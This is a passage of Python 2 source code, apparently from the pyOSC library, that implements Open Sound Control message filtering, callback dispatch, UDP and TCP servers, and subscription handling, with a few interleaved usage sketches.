'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message,
or a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = out.values()
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in filters.keys():
if filters['/*']:
out = msg
else:
out = None
elif False in filters.values():
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in filters.keys():
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = out.values()
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in self.targets.items():
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, out)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return self.callbacks.keys()
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the received message
- tags (string): The OSC-typetags of the received message's arguments, without ','
- data (list): The message arguments
- client_address ((host, port) tuple): the address the message was received from
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in self.callbacks.keys():
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
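# Editor's sketch: register a callback on a bare OSCAddressSpace and dispatch
# a message to it, without any server or network involved.
def _example_addressSpace():
    space = OSCAddressSpace()
    def volume_handler(addr, tags, data, client_address):
        return None  # a handler may instead return an OSCMessage as a reply
    space.addMsgHandler("/synth/volume", volume_handler)
    replies = space.dispatchMessage("/synth/volume", "f", [0.5], ("127.0.0.1", 9000))
    assert replies == []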
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-addresses
that have been registered to the server with a callback-function.
If the address-pattern of the message matches the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.setServer(self)
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return cmp(self.socket._sock, other.socket._sock) == 0
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix>' -> serverInfo_handler
- '<prefix><error_prefix>' -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt)
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in self.callbacks.keys():
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retreive <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retreive <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError, e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
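# --- Editor's usage sketch (not part of the original library) ---
# Bind a synchronous OSCServer to an ephemeral local port, register the
# default handlers, then shut it down again.
def _example_oscServer():
    server = OSCServer(("127.0.0.1", 0))
    server.addDefaultHandlers()
    print "server bound to osc://%s" % getUrlStr(server.address())
    server.close()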
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# use the threading request handler, so bundled messages get unpacked concurrently
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# use the threading request handler, so bundled messages get unpacked concurrently
RequestHandlerClass = ThreadingOSCRequestHandler
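# Editor's sketch of the usual asynchronous-server pattern: serve_forever()
# runs in a worker thread (it times out periodically via socket_timeout, so
# close() can stop the loop), while the main thread does other work.
def _example_threadingServer():
    server = ThreadingOSCServer(("127.0.0.1", 0))
    server.addMsgHandler("default", server.msgPrinter_handler)
    worker = threading.Thread(target=server.serve_forever)
    worker.start()
    # ... send OSC messages to server.address() from some OSCClient here ...
    server.close()
    worker.join()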
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because usually tcp server spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print "SERVER: New client connection."
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print "SERVER: Client connection handled."
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error, e:
if e[0] == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get the OSC packet size from the stream; it is prepended to each transmission
chunk = self._receive(4)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print "SERVER: Entered server loop"
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print "OSC stream server: Spurious message received."
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error, e:
if e[0] == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fulfilled
print "SERVER: Connection has been reset by peer."
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread-safe.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so-called processing queue into which
all pending messages or sub-bundles are inserted to be processed in the future.
When a sub-bundle or message gets queued, a mechanism must be provided so that
those messages get invoked when their timetag is due. There are the following
options:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- address ((host, port) tuple): the local host & TCP-port
the server listens on for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is the same for
all connections.
"""
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. a synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server), care must be taken, e.g. by installing synchronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
